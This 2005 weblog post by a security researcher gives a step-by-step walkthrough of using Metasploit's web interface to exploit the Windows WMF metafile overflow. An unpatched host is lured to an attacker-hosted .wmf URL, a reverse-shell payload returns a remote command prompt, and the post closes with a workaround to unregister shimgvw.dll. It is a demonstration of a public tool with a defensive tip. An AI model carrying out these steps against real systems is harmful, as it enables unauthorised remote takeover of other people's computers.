Exploiting the Windows XP/2003 Picture and Fax Viewer Metafile Overflow Vulnerability
 | ||
 | Email weblog link | |
 | Discuss | |
 | Blog this |
Nitesh Dhanjani
Dec. 29, 2005 07:50 AM
Permalink
1) Download the latest Metasploit 2.x Snapshot
2) Run
./msfweb3) Point your web browser to http://127.0.0.1:55555
4) Click on "Windows XP/2003 Picture and Fax Viewer Metafile Overflow"
5) Click on "Automatic - Windows XP / Windows 2003 (default)"
6) Select a payload. For example, "win32_reverse". Make sure you have your firewall turned off, or have a rule allowing incoming connections to port 8080 (or whatever port you choose)
7) Click on "-Exploit-"
8) From an un-patched (this is easy as of today, since there is no official patch for this vulnerability) Windows XP or 2003 host, use Internet Explorer browse to http://[ip]:8080/anything.wmf where [ip] is set to the ip-address of the host running Metasploit.
9) Your Metasploit browser session should now output details:
10) Click on the "Session [number]" link, and you now have shell access to the Windows host! Type in the DOS command of your choice, for example "ipconfig" in the screenshot below:
Lets hope there is a official patch released soon! Meanwhile, disable actions on the .wmf extension. Here are instructions on how to do this from the advisory:
on the Start menu, choose Run, type "regsvr32 -u %windir%\system32\shimgvw.dll", and then click OK.
Nitesh Dhanjani is a well known security researcher, author, and speaker. Dhanjani has been invited to talk at various information security events such as the Black Hat Briefings, RSA, Hack in the Box, Microsoft Blue Hat, and OSCON.
Return to weblogs.oreilly.com.
Weblog authors are solely responsible for the content and accuracy of their weblogs, including opinions they express, and O'Reilly Media, Inc., disclaims any and all liabililty for that content, its accuracy, and opinions it may contain.
This work is licensed under a
Creative Commons License.
